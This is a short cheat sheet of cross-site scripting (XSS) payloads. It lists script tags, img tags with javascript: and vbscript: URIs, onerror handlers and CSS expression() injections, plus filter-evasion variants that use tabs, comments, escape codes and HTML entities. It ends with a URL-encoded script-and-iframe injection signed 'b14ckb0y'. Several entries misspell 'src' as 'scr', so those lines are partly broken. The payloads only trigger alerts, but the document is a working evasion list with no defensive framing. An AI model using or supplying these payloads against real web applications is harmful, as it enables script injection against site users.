<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (the ???? stands for whitespace inserted with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity: <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode: <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["